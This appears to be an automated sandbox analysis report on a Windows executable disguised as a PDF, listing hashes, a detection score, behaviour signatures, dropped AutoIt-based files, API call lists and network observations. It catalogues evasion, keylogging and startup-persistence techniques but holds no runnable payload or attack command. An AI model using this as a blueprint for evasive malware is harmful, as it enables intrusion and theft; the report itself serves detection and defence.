Windows Analysis Report
scan_doc_zapit_836893.pdf.exe

Overview

General Information

Sample name: scan_doc_zapit_836893.pdf.exe
Analysis ID: 1546130
MD5: cbcb0ff5aa471e22a6b129196a556d97
SHA1: b3dca2cac1624e6a8b318708c02376c1eb6ab784
SHA256: 5c1ce789a60371e388881ffbe0311bd2829e5e8dbaf77506929e50638f22d866

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Sigma detected: Suspicious Double Extension File Execution
AI detected suspicious sample
Deletes itself after installation
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Sigma detected: WScript or CScript Dropper
Uses an obfuscated file name to hide its real file extension (double extension)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 89.3% probability
Source: scan_doc_zapit_836893.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: scan_doc_zapit_836893.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose, 11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD14 FindFirstFileW,FindClose, 11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEFA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00764005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00764005
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076494A GetFileAttributesW,FindFirstFileW,FindClose, 17_2_0076494A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076C2FF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD14 FindFirstFileW,FindClose, 17_2_0076CD14
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 17_2_0076CD9F
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F5D8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F735
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076FA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00763CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00763CE2
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49744
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.6:49920
Source: unknown DNS traffic detected: query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 11_2_00AF29BA
Source: global traffic DNS traffic detected: DNS query: EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0A
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://ocsp.digicert.com0X
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmp, NanoCipher.scr, 00000011.00000000.2289726663.00000000007C9000.00000002.00000001.01000000.00000008.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: scan_doc_zapit_836893.pdf.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: NanoCipher.scr.11.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000291B000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000404C000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, Spy.pif.2.dr, Tim.0.dr, NanoCipher.scr.11.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_00AF4830
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00774830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 17_2_00774830
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_00AF4632
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B0D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_00B0D164
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0078D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 17_2_0078D164

System Summary

Source: initial sample Static PE information: Filename: scan_doc_zapit_836893.pdf.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE42D5: CreateFileW,DeviceIoControl,CloseHandle, 11_2_00AE42D5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_00AD8F2E
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx, 0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_00AE5778
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00765778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 17_2_00765778
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe File created: C:\Windows\GccIncluded
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_0040497C 0_2_0040497C
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406ED2 0_2_00406ED2
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004074BB 0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A8B020 11_2_00A8B020
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A894E0 11_2_00A894E0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A89C80 11_2_00A89C80
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA23F5 11_2_00AA23F5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B08400 11_2_00B08400
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB6502 11_2_00AB6502
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A8E6F0 11_2_00A8E6F0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB265E 11_2_00AB265E
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA282A 11_2_00AA282A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB89BF 11_2_00AB89BF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B00A3A 11_2_00B00A3A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB6A74 11_2_00AB6A74
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A90BE0 11_2_00A90BE0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00ADEDB2 11_2_00ADEDB2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AACD51 11_2_00AACD51
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00B00EB7 11_2_00B00EB7
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE8E44 11_2_00AE8E44
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB6FE6 11_2_00AB6FE6
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA33B7 11_2_00AA33B7
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AAF409 11_2_00AAF409
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A9D45D 11_2_00A9D45D
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A8F6A0 11_2_00A8F6A0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA16B4 11_2_00AA16B4
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A9F628 11_2_00A9F628
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A81663 11_2_00A81663
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA78C3 11_2_00AA78C3
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA1BA8 11_2_00AA1BA8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AADBA5 11_2_00AADBA5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB9CE5 11_2_00AB9CE5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A9DD28 11_2_00A9DD28
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA1FC0 11_2_00AA1FC0
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AABFD6 11_2_00AABFD6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0070B020 17_2_0070B020
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007094E0 17_2_007094E0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00709C80 17_2_00709C80
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007223F5 17_2_007223F5
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00788400 17_2_00788400
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00736502 17_2_00736502
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0073265E 17_2_0073265E
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0070E6F0 17_2_0070E6F0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072282A 17_2_0072282A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007389BF 17_2_007389BF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00736A74 17_2_00736A74
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00780A3A 17_2_00780A3A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00710BE0 17_2_00710BE0
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072CD51 17_2_0072CD51
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0075EDB2 17_2_0075EDB2
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00768E44 17_2_00768E44
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00780EB7 17_2_00780EB7
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00736FE6 17_2_00736FE6
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_007233B7 17_2_007233B7
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071D45D 17_2_0071D45D
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072F409 17_2_0072F409
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00701663 17_2_00701663
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0071F628 17_2_0071F628
